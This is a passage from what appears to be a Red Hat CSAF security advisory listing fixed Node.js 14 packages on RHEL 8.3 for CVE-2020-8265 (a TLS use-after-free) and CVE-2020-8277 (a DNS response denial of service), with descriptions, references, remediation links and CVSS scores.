"notes": [ { "category": "description", "text": "A flaw was found in nodejs. When writing to a TLS enabled socket, node::StreamBase::Write calls node::TLSWrap::DoWrite with a freshly allocated WriteWrap object as first argument. If the DoWrite method does not return an error, this object is passed back to the caller as part of a StreamWriteResult structure. This may be exploited to corrupt memory leading to a Denial of Service or potentially other exploits.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: use-after-free in the TLS implementation", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-8265" }, { "category": "external", "summary": "RHBZ#1912854", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912854" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-8265", "url": "https://www.cve.org/CVERecord?id=CVE-2020-8265" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8265", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8265" }, { "category": "external", "summary": "https://hackerone.com/reports/988103", "url": "https://hackerone.com/reports/988103" } ], "release_date": "2021-01-04T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:28:03+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0551" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs: use-after-free in the TLS implementation" }, { "cve": "CVE-2020-8277", "cwe": { "id": "CWE-119", "name": "Improper Restriction of Operations within the Bounds of a Memory Buffer" }, "discovery_date": "2020-11-16T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1898554" } ], "notes": [ { "category": "description", "text": "A Node.js application that allows an attacker to trigger a DNS request for a host of their choice could trigger a Denial of Service in versions \u003c 15.2.1, \u003c 14.15.1, and \u003c 12.19.1 by getting the application to resolve a DNS record with a larger number of responses. This is fixed in 15.2.1, 14.15.1, and 12.19.1.", "title": "Vulnerability description" }, { "category": "summary", "text": "c-ares: ares_parse_{a,aaaa}_reply() insufficient naddrttls validation DoS", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-8277" }, { "category": "external", "summary": "RHBZ#1898554", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898554" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-8277", "url": "https://www.cve.org/CVERecord?id=CVE-2020-8277" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8277", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8277" } ], "release_date": "2020-11-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:28:03+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0551" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": 